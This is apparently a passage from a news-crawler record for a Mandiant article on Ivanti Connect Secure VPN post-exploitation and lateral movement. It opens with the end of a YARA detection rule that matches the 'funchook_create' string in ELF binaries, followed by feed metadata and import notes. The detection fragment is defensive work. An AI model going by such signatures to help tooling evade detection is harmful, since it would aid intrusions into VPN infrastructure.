\"funchook_create\" ascii fullword\n \n condition: \n uint32(0) == 0x464c457f and all of them\n}\n</code></pre></div>" rss_fields: - title - summary - categories - published - entry_id - url - author carlessian_info: news_filer_version: 2 newspaper: Google Cloud Blog macro_region: Technology url: https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement/ author: 'Mandiant ' published: 2024-04-04 14:00:00.000000000 Z
Language
Active
Ricc internal notes
Imported via /usr/local/google/home/ricc/git/gemini-news-crawler/webapp/db/seeds.d/import-feedjira.rb on 2024-04-05 09:24:46 +0200. Content is EMPTY here. Entried: title,summary,categories,published,entry_id,url,author. TODO add Newspaper: filename = /usr/local/google/home/ricc/git/gemini-news-crawler/webapp/db/seeds.d/../../../crawler/out/feedjira/Technology/Google Cloud Blog/2024-04-04-Cutting_Edge,_Part_4:_Ivanti_Connect_Secure_VPN_Post-Exploitatio-v2.yaml
Ricc source
Show this article
Back to articles